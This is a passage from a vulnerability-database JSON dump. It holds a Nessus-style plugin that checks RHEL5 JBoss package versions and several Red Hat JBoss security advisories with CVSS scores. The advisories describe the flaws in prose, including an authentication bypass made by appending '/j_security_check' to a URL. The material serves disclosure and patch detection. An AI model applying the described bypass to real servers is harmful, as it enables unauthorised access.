flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"jboss-seam2-runtime-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-client-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-hornetq-5.2.0-5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-messaging-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-tp-licenses-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-ws-cxf-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-ws-native-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbosssx2-2.0.5-8.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el5\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jgroups-2.6.22-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-as-5-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"netty-3.2.5-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-federation-2.1.5-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-eap-docs-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-eap-docs-examples-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"wss4j-1.5.12-4.1_patch_02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-security-1.5.1-2.ep5.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-21T04:46:43", "description": "Security fixes:\n\nAn attack technique 
against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no\nsecurity context was provided. Depending on the deployed applications, this\ncould possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles\ndid not actually restrict access, allowing remote attackers with valid JMX\nInvoker credentials to perform JMX operations accessible to roles they are\nnot a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. 
(CVE-2009-5066)\n\nIt was found that NonManagedConnectionFactory would log the username and\npassword in plain text when an exception was thrown. This could lead to the\nexposure of authentication credentials if local users had permissions to\nread the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487, and Tyler Krpata for reporting\nCVE-2011-4575. 
CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de\nWolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; and\nCVE-2012-0874 was discovered by David Jorm of the Red Hat Security Response\nTeam.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-31T00:00:00", "type": "redhat", "title": "(RHSA-2013:0221) Important: JBoss Enterprise BRMS Platform 5.3.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2017-07-24T20:13:43", "id": "RHSA-2013:0221", "href": "https://access.redhat.com/errata/RHSA-2013:0221", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T04:44:46", "description": "Security:\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. 
(CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. (CVE-2011-2730)\n\nNote: Manual action is required to apply the fix for CVE-2011-2730. If your\nsystem has deployed applications which use Spring framework, the context\nparameter \"springJspExpressionSupport\" must be set to \"false\" to mitigate\nthis flaw, for example, in the application's web.xml file. This will\nprevent the double-evaluation of EL expressions that led to this flaw.\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nA denial of service flaw was found in the implementation of associative\narrays (hashes) in JRuby. An attacker able to supply a large number of\ninputs to a JRuby application (such as HTTP POST request parameters sent to\na web application) that are used as keys when inserting data into an array\ncould trigger multiple hash function collisions, making array operations\ntake an excessive amount of CPU time. To mitigate this issue, the Murmur\nhash function has been replaced with the Perl hash function.\n(CVE-2012-5370)\n\nNote: JBoss Enterprise SOA Platform only provides JRuby as a dependency of\nthe scripting_chain quickstart example application. 
The CVE-2012-5370 flaw\nis not exposed unless the version of JRuby shipped with that quickstart is\nused by a deployed, custom application.\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-2487, and Tyler Krpata for reporting CVE-2011-4575.\nThe CVE-2012-3370 and CVE-2012-3369 issues were discovered by Carlo de Wolf\nof Red Hat; CVE-2012-5478 was discovered by Derek Horton of Red Hat; and \nCVE-2012-0874 was discovered by David Jorm of the Red Hat Security Response\nTeam.\n\nWarning: Before applying the update, back up your existing JBoss Enterprise\nSOA Platform installation (including its databases, applications,\nconfiguration files, and so on).\n\nAll users of JBoss Enterprise SOA Platform 5.3.0 as provided from the Red\nHat Customer Portal are advised to upgrade to JBoss Enterprise SOA Platform\n5.3.1.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-02-20T00:00:00", "type": "redhat", "title": "(RHSA-2013:0533) Important: JBoss Enterprise SOA Platform 5.3.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-5370", "CVE-2012-5478", 
"CVE-2012-5629"], "modified": "2017-07-24T20:13:52", "id": "RHSA-2013:0533", "href": "https://access.redhat.com/errata/RHSA-2013:0533", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:36:53", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. 
(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0198) Important: JBoss Enterprise Web Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:39:14", "id": "RHSA-2013:0198", "href": "https://access.redhat.com/errata/RHSA-2013:0198", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2021-10-19T18:40:55", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. 
Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0194) Important: JBoss Enterprise Application Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 